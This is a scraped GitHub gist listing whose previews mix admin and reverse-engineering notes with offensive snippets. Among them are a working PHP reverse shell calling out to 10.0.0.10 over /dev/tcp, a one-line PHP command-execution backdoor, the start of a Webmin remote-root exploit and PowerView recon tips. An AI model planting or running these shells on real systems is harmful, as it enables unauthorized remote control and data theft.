Skip to content

Instantly share code, notes, and snippets.

View tanaka-geek's full-sized avatar

tanaka tanaka-geek

  • Tokyo
View GitHub Profile
@leommoore
leommoore / nginx_basics.md
Last active May 27, 2024 09:17
Nginx Basics

#Nginx Basics for Ubuntu

Please see http://wiki.nginx.org/Main for more information. See http://arstechnica.com/gadgets/2012/11/how-to-set-up-a-safe-and-secure-web-server/ for a tutorial on how to install Nginx.

##Installation To install, you can install the version which is in the standard Ubuntu repositories but it is normally quite old and will not have the latest security patches. The best way is to update the repositories first:

apt-get update
apt-get install python-software-properties

apt-get upgrade

@FiloSottile
FiloSottile / 32.asm
Last active November 7, 2024 06:51
NASM Hello World for x86 and x86_64 Intel Mac OS X (get yourself an updated nasm with brew)
; /usr/local/bin/nasm -f macho 32.asm && ld -macosx_version_min 10.7.0 -o 32 32.o && ./32
global start
section .text
start:
push dword msg.len
push dword msg
push dword 1
mov eax, 4
@soarez
soarez / ca.md
Last active October 29, 2024 18:12
How to setup your own CA with OpenSSL

How to setup your own CA with OpenSSL

For educational reasons I've decided to create my own CA. Here is what I learned.

First things first

Lets get some context first.

@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@sente
sente / Simple-Backdoor-One-Liner.php
Last active September 26, 2024 20:28
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
@subfuzion
subfuzion / curl.md
Last active November 17, 2024 03:54
curl POST examples

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

@williballenthin
williballenthin / yet another radare2 cheatsheet.md
Last active November 11, 2024 12:38

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@Paradoxis
Paradoxis / agressive-url-encode.md
Last active February 10, 2024 23:00
Agressive URL encode

Agressive URL encode

Python based CLI tool to agressively url-encode strings, rather than just encoding non-url characters this tool will encode every character in the URL.

Usage:

Firstly make a function in your .bash_profile to call the script

function url-encode()
{
 python ~//url_encode.py $@
@oxagast
oxagast / wmsploit-remote-root-1.29-reprise.sh
Created April 26, 2017 11:10
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active November 17, 2024 06:10
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set